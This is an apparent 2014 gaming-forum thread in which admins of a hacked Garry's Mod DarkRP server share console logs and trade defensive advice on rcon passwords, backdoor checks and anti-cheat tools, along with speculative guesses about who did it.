My friend's DarkRP server was hacked by (what seems to be) the Syrian Electronic Army this afternoon.

Here are a few screenshots.

(Hacker’s steam ID is in the second screenshot)

The console screenshots tell the story.

  • A guy somehow finds a way to unban himself (from what the head admin says the initial ban was from an attack of the same sort)
  • Temporarily shuts down the server, displaying some sort of propaganda/advert/whatever
  • Changes the loading screen html to a separate image saying something along the lines of “Why must the United States government interfere with our internal affairs?”
  • Automatically bans you upon re-connecting.

The logs are nothing that’s not in the screens already, but this comes form another admin.

(Console) unbanned steamid STEAM_0:0:49191585 (mom im japanese now)
➡PT➡JimmyDean suicided!
[DarkRP] ➡PT➡JimmyDean was killed by Himself with a suicide trick
(OOC) Soul <3: There we go.
(OOC) Soul <3: wait wat.
Client "newtee2" spawned in server <STEAM_0:0:12235695> (took 24 seconds).
[DarkRP] newtee2 (STEAM_0:0:12235695) has joined the game
(OOC) -ULTI- Shinnobisty5: Oh god.
(OOC) -ULTI- Shinnobisty5: Not again.
(OOC) Soul <3: i thought he was supposed to be banned
(OOC) Soul <3: OH SHEIT
ULTI Tanner teleported to -ULTI- Shinnobisty5
(OOC) Mark Bessette: hey shinno
(OOC) -ULTI- Shinnobisty5: He is using a backdoor
(OOC) -ULTI- Shinnobisty5: -.-
Client "Handsome Matt" spawned in server <STEAM_0:0:49191585> (took 28 seconds).
[DarkRP] Handsome Matt (STEAM_0:0:49191585) has joined the game
Soul <3 teleported to -ULTI- Shinnobisty5
Soul <3 killed mom im japanese now using m9k_striker12
[DarkRP] mom im japanese now was killed by Soul <3 with a m9k_striker12
Dropped "mom im japanese now" from server<STEAM_0:0:49191585>
[DarkRP] mom im japanese now (STEAM_0:0:49191585) disconnected
-ULTI- Shinnobisty5 banned mom im japanese now permanently (Quit it RB)
Soul <3 returned Themself to their original position
ULTI Tanner teleported to loroguy
(OOC) aidanpot1: what shinno?
Console set your money to $0.
(OOC) Soul <3: he was the guy who hacked us before
Commencing connection retry to [IP]
Client sending to server with no netchannel!
Client sending to server with no netchannel!
Connecting to [IP]
Connected to [IP]
DarkRPMap: rp_downtown_v4c_v2
Players: 4 / 37
Build: 5692
Server Number: 1
[Server Name]

Do you have your rcon password in your server.cfg?
Try type ss_texta in your console see if it gives you an unknown command.
Check if you have any suspicious runstrings in any of your lua files.

LeyAC just released publicly. Download it, lock the server, do what the config says, and then you’ll be fine.

No it won’t.
I have no idea what makes you think that.

I’m not the server owner but ill get this to him ASAP. Thanks a bunch.

Turns out the loading screen & title were changed, possibly other stuff too. Still working on getting the logs up.

Try A)Resetting the server and setting up LeyAC.
B)Get a new IP and server name(This worked for me at one point)

Just joined a server that was hacked.
It’s not ss_texta so it’s most likely the rcon password in the server config.

Explain to me how LeyAC is going to prevent the “hackers” from using rcon?

Hide the RCON in the command line rather than in the server.cfg. Problem solved.

The Logs are up. Nothing that isn’t in the screenshots already though.

Again, Get LeyAC, hide the Rcon in the command line.

Well, just checked the server. There is 0 open net.Receive() exploits, therefore the last remaining possible options are.

a. Delete your rcon
b. He has access to FTP

check em both

wow thx narwhal, master cheet bloker!

I’ll let the owner know ASAP.

LeyAC only stops public hacks, (probably a few private) But that doesn’t mean it stops all cheats being used. The best solution would be either to check for backdoor addons, hide rcon password, change the Rcon password. Or if the FTP is compromised i suggest contacting the server provider/host to change those passwords and usernames too.

remove your rcon password from the server.cfg

This seems a bit more like a script kiddy, rather than a private hacker. Also, SteamID in the photos might be faked. A hacker group I dealt with awhile back had some way to make them look like another person and have that persons steamid.

Anyone else confused? I’m just going to stay out of this and mind my own business elsewhere. Good luck with…all this.

Good luck to you as well, SyrianEA, who knows, You might have a good point.

Handsome Matt (STEAM_0:0:49191585)

this is rbreslow btw.

[editline]27th September 2014[/editline]

oh wait that’s actually Extronic rbreslow is just another fuck nugget using my name.

Isn’t that Steam ID rbreslow’s? It has the name spidermanturnoffthedark, which is rbreslow’s Steam ID according to his Facepunch profile.

Also RBreslow is the one who made the Purge script, and if you look on coderhire it was RBreslow same steamID as the one that did that hack. O.o -fishhy-